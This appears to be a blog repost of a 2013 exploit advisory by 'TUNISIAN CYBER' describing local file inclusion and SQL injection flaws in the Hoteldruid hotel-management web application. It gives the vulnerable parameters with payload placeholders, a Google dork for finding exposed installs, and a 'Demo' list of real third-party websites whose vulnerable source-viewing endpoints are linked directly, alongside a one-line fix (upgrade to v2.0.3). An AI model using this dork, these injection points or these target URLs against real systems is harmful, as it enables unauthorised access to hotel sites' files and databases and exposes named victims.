14 Aralık 2013 Cumartesi

Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulenrabilities

+] Author: TUNISIAN CYBER
[+] Exploit Title:  Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulenrabilities
[+] Date: 14-12-2013
[+] Category: WebApp
[+] Vendor: http://www.hoteldruid.com/en/download.html
[+] Google Dork: inurl:"mostra_sorgente.php"
[+] Tested on: Win7 , ubuntu 13.04
  
  
########################################################################################
Description:
Hoteldruid is an open source program for hotel management (property management software) suffers from Local File Inclusion and SQL injection
 
I/LFI:
http://127.0.0.1/php-residence/mostra_sorgente.php?file_sorgente=[FILE]
 
II/SQLi:
http://127.0.0.1/php-residence/creaprezzi.php?anno=[YEAR]'
http://127.0.0.1/php-residence/messaggi.php?id_sessione=&anno=[YEAR]'
 
Fix:
Upgrade to v2.0.3
Demo:
 
http://www.hoteldruid.com/demo/mostra_sorgente.php?file_sorgente=clienti.php
https://lodginginspirational.com/mostra_sorgente.php?file_sorgente=clienti.php
http://www.at184.com/availability/mostra_sorgente.php?file_sorgente=/
http://www.pantelleriaest.com/hoteldruid/mostra_sorgente.php?file_sorgente=crea_backup.php
http://tbg.evolve2.org/mostra_sorgente.php?file_sorgente=themes/snj/php/menu.php
Gönderen zaman:

Hiç yorum yok:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)